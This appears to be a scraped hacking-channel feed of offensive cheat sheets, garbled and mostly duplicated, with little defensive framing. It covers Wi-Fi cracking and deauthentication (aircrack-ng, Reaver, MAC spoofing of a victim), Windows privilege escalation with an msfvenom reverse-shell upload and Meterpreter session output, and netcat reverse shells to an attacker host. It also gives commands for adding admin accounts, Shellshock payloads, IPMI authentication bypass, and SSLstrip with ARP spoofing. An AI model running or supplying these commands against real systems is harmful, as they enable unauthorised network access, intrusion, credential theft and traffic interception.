airmon-ng start wlan0
Detect all available wireless APβs and clients
airodump-ng mon0
Setting adapter channel
iwconfig mon0 channel <channelnumber>
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
aircrack-ng -b (bssid) (file name-01.cap)
Rogue Access Point Testing
--------------------------
# ifconfig wlan0 down
# iw reg set BO
# iwconfig wlan0 txpower 0
# ifconfig wlan0 up
# airmon-ng start wlan0
# airodump-ng --write capture mon0
root@backbox:/home/backbox# ifconfig wlan1 down
root@backbox:/home/backbox# iw reg set BO
root@backbox:/home/backbox# ifconfig wlan1 up
root@backbox:/home/backbox# iwconfig wlan1 channel 13
root@backbox:/home/backbox# iwconfig wlan1 txpower 30
root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto
Reaver
------
airmon-ng start wlan0
airodump-ng wlan0
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv
reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -S --no-nacks -d7 -vv -c 1
Pixie WPS
---------
airmon-ng check
airmon-ng start wlan0
airodump-ng wlan0mon --wps
reaver -i wlan0mon -c 11 -b 00:00:00:00:00:00 -K 1
Wireless Notes
--------------
Wired Equivalent Privacy (WEP)
RC4 stream cipher w/ CRC32 for integrity check
- Attack:
By sniffing an ARP packet, then replaying it to get many encrypted replies with different IVs.
- Remediation:
Use WPA2
Wifi Protected Access (WPA)
Temporal Key Integrity Protocol (TKIP) Message Integrity Check
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
Use long-keys
Wifi Protected Access 2 (WPA2)
Advanced Encryption Standard (AES)
- Attack:
Uses a four way handshake, and if that handshake can be captured, then a dictionary attack ban be mounted to find the Pairwise Master Key for the Access Point and client Station.
- Remediation:
WPA-Enterprise
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WIRELESS ANTENNA ALL YOU NEED IS HIT UP THOSE COMMANDS ON YOUR TEMINAL :)
- #Wifihacking
Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 βp 0841 βc FF:FF:FF:FF:FF:FF βb <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng βb <BSSID> <PCAP_of_FileName>
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 βx 1000 βn 1000 βb <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng βb <BSSID> <PCAP_of_FileName>
Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 βe <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -4 βb <BSSID> -h <OurMac> wlan0mon
#Press βyβ ;
root@uceka:~# packetforge-ng -0 βa <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 βr <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 βe <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -5 βb<BSSID> -h < OurMac > wlan0mon
#Press βyβ ;
root@uceka:~# packetforge-ng -0 βa <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 βr <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 10 βa <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger β-mac <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 βb <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aireplay-ng β-deauth 1 βa <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WIRELESS ANTENNA ALL YOU NEED IS HIT UP THOSE COMMANDS ON YOUR TEMINAL :)
- #Wifihacking
Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Increase Wi-Fi TX Power
root@uceka:~# iw reg set B0
root@uceka:~# iwconfig wlan0 txpower <NmW|NdBm|off|auto>
#txpower is 30 (generally)
#txpower is depends your country, please googling
root@uceka:~# iwconfig
Change WiFi Channel
root@uceka:~# iwconfig wlan0 channel <SetChannel(1-14)>
WEP CRACKING
Method 1 : Fake Authentication Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 -a <BSSID> -h <OurMac> -e <ESSID> wlan0mon
root@uceka:~# aireplay-ng -2 βp 0841 βc FF:FF:FF:FF:FF:FF βb <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng βb <BSSID> <PCAP_of_FileName>
Method 2 : ARP Replay Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -3 βx 1000 βn 1000 βb <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aircrack-ng βb <BSSID> <PCAP_of_FileName>
Method 3 : Chop Chop Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 βe <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -4 βb <BSSID> -h <OurMac> wlan0mon
#Press βyβ ;
root@uceka:~# packetforge-ng -0 βa <BSSID> -h <OurMac> -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 βr <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 4 : Fragmentation Attack
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
#Whatβs my mac?
root@uceka:~# macchanger --show wlan0mon
root@uceka:~# aireplay-ng -1 0 βe <ESSID> -a <BSSID> -h <OurMac> wlan0mon
root@uceka:~# aireplay-ng -5 βb<BSSID> -h < OurMac > wlan0mon
#Press βyβ ;
root@uceka:~# packetforge-ng -0 βa <BSSID> -h < OurMac > -k <SourceIP> -l <DestinationIP> -y <XOR_PacketFile> -w <FileName2>
root@uceka:~# aireplay-ng -2 βr <FileName2> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
Method 5 : SKA (Shared Key Authentication) Type Cracking
root@uceka:~# airmon-ng start wlan0
root@uceka:~# airodump-ng βc <AP_Channel> --bssid <BSSID> -w <FileName> wlan0mon
root@uceka:~# aireplay-ng -0 10 βa <BSSID> -c <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# macchanger β-mac <VictimMac> wlan0mon
root@uceka:~# ifconfig wlan0mon up
root@uceka:~# aireplay-ng -3 βb <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aireplay-ng β-deauth 1 βa <BSSID> -h <FakedMac> wlan0mon
root@uceka:~# aircrack-ng <PCAP_of_FileName>
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
GM328A reverse engineering, new firmware and Tetris!.pdf
4.9 MB
reverse engineering tutorial
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME Windows TRICKS :
Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html
Try the getsystem command using meterpreter - rarely works but is worth a try.
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
msfvenom -p windows/meterpreter/reversetcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
curl http://$ip/aspshell3.asp;.txt
* Started reverse TCP handler on 1.2.3.4:443
* Starting the payload handler...
* Sending stage (957487 bytes) to 1.2.3.5
* Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe -d "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP
Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
MS16-032 https://www.exploit-db.com/exploits/39719/
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Run As - Switching users in linux is trival with the
Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME Windows TRICKS :
Windows Privilege Escalation resource
http://www.fuzzysecurity.com/tutorials/16.html
Try the getsystem command using meterpreter - rarely works but is worth a try.
meterpreter > getsystem
Metasploit Meterpreter Privilege Escalation Guidehttps://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Windows Server 2003 and IIS 6.0 WEBDAV Exploiting
http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html
msfvenom -p windows/meterpreter/reversetcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt
cadavar http://$ip
dav:/> put aspshell.txt
Uploading aspshell.txt to `/aspshell.txt':
Progress: [=============================>] 100.0% of 38468 bytes succeeded.
dav:/> copy aspshell.txt aspshell3.asp;.txt
Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded.
dav:/> exit
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reversetcp
msf exploit(handler) > set LHOST 1.2.3.4
msf exploit(handler) > set LPORT 80
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
curl http://$ip/aspshell3.asp;.txt
* Started reverse TCP handler on 1.2.3.4:443
* Starting the payload handler...
* Sending stage (957487 bytes) to 1.2.3.5
* Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700
Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server.
pip install pyinstaller
wget -O exploit.py http://www.exploit-db.com/download/31853
python pyinstaller.py --onefile exploit.py
Windows Server 2003 and IIS 6.0 privledge escalation using impersonation:
https://www.exploit-db.com/exploits/6705/
https://github.com/Re4son/Churrasco
c:\Inetpub>churrasco
churrasco
/churrasco/-->Usage: Churrasco.exe -d "command to run"
c:\Inetpub>churrasco -d "net user /add <username> <password>"
c:\Inetpub>churrasco -d "net localgroup administrators <username> /add"
c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" <username> /ADD"
Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
python pyinstaller.py --onefile ms11-080.py
mx11-080.exe -O XP
Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell:
MS16-032 https://www.exploit-db.com/exploits/39719/
powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"
Powershell Priv Escalation Toolshttps://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Windows Run As - Switching users in linux is trival with the
SU command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows.Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system).
C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
OffSec
Privilege Escalation - Metasploit Unleashed
Metasploit has a Meterpreter "getsystem" script, that will use a number of different techniques in attempt to gain SYSTEM level privileges on the remote target.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Windows 10 Public Cve & Bugs :
CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter
Passing - Could Allow Information Disclosure
CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution
CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Windows 10 Public Cve & Bugs :
CVE-2015-1769 MS15-085 - Vulnerability in Mount Manager - Could Allow Elevation of Privilege
CVE-2015-2426 ms15_078_atmfd_bof MS15-078 - exploits a pool based buffer overflow in the atmfd.dll driver
CVE-2015-2479 MS15-092 - Vulnerabilities in .NET Framework - Allows Elevation of Privilege
CVE-2015-2513 MS15-098 - Vulnerabilities in Windows Journal - Could Allow Remote Code Execution
CVE-2015-2423 MS15-088 - Unsafe Command Line Parameter
Passing - Could Allow Information Disclosure
CVE-2015-2431 MS15-080 - Vulnerabilities in Microsoft Graphics Component - Could Allow Remote Code Execution
CVE-2015-2441 MS15-091 - Vulnerabilities exist when Microsoft Edge improperly accesses objects in memory - allows remote code execution
CVE-2015-0057 exploits GUI component of Windows namely the scrollbar element - allows complete control of a Windows machine
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Verify Various Vulnerabilities
+ IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931
Tools required:
ipmitool
freeipmi-tools
ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list
# Specifying Cipher Suite Zero
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor
+ Bash Remote Code Execution (Shellshock)
http://www.tenable.com/plugins/index.php?view=single&id=77823
x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
x: () { :;}; echo "Hacked" > /var/www/hacked.html
+ DNS Server Cache Snooping Remote Information Disclosure
http://www.tenable.com/plugins/index.php?view=single&id=12217
Nmap Script: dns-cache-snoop
http://nmap.org/nsedoc/scripts/dns-cache-snoop.html
nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>
+ IP Forwarding Enabled
http://www.tenable.com/plugins/index.php?view=single&id=50686
Nmap Script: ip-forwarding
http://nmap.org/nsedoc/scripts/ip-forwarding.html
sudo nmap -sn <target> --script ip-forwarding --script-args='target=www.example.com'
Alternatives:
- Set VM's default gateway as the victim IP address and attempt to route elsewhere.
- http://pentestmonkey.net/tools/gateway-finder
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Verify Various Vulnerabilities
+ IPMI Cipher Suite Zero Authentication Bypass:
http://www.tenable.com/plugins/index.php?view=single&id=68931
Tools required:
ipmitool
freeipmi-tools
ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list
# Specifying Cipher Suite Zero
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell
ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor
+ Bash Remote Code Execution (Shellshock)
http://www.tenable.com/plugins/index.php?view=single&id=77823
x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
x: () { :;}; echo "Hacked" > /var/www/hacked.html
+ DNS Server Cache Snooping Remote Information Disclosure
http://www.tenable.com/plugins/index.php?view=single&id=12217
Nmap Script: dns-cache-snoop
http://nmap.org/nsedoc/scripts/dns-cache-snoop.html
nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' <target>
+ IP Forwarding Enabled
http://www.tenable.com/plugins/index.php?view=single&id=50686
Nmap Script: ip-forwarding
http://nmap.org/nsedoc/scripts/ip-forwarding.html
sudo nmap -sn <target> --script ip-forwarding --script-args='target=www.example.com'
Alternatives:
- Set VM's default gateway as the victim IP address and attempt to route elsewhere.
- http://pentestmonkey.net/tools/gateway-finder
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
Tenable
IPMI Cipher Suite Zero Authentication Bypass
The remote IPMI service is affected by an authentication bypass. (Nessus Plugin ID 68931)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Configure an Ethernet interface as a VLAN trunk
Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.
+ First install the vlan package if it is not already present:
apt-get install vlan
+ Turn off network-manager
sudo stop network-manager
+ Configuring interfaces
vconfig add eth0 <VLAN ID> (you may get a warning message on the first one)
example: vconfig add eth0 101
ifconfig eth0.<VLAN ID> <IP Address>/24 up
example: ifconfig eth0.101 192.168.1.10/24 up
ifconfig eth0.<VLAN ID>
Note: If any issues run, ifconfig eth0 0.0.0.0 up
Note: Specify interface with nmap scanning (nmap -e eth0.101)
Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add)
+ Remove Configuration
vconfig rem eth0.101
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Configure an Ethernet interface as a VLAN trunk
Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3.
+ First install the vlan package if it is not already present:
apt-get install vlan
+ Turn off network-manager
sudo stop network-manager
+ Configuring interfaces
vconfig add eth0 <VLAN ID> (you may get a warning message on the first one)
example: vconfig add eth0 101
ifconfig eth0.<VLAN ID> <IP Address>/24 up
example: ifconfig eth0.101 192.168.1.10/24 up
ifconfig eth0.<VLAN ID>
Note: If any issues run, ifconfig eth0 0.0.0.0 up
Note: Specify interface with nmap scanning (nmap -e eth0.101)
Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add)
+ Remove Configuration
vconfig rem eth0.101
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SSL Strip
Kali-Ubuntu-parrot pre installed tool
#FastTips
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3) sslstip.py -l 8080 -f lock.ico
4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
ENJOYβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SSL Strip
Kali-Ubuntu-parrot pre installed tool
#FastTips
1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward
2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
3) sslstip.py -l 8080 -f lock.ico
4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
ENJOYβ€οΈππ»
β β β Uππ»βΊπ«Δπ¬πβ β β β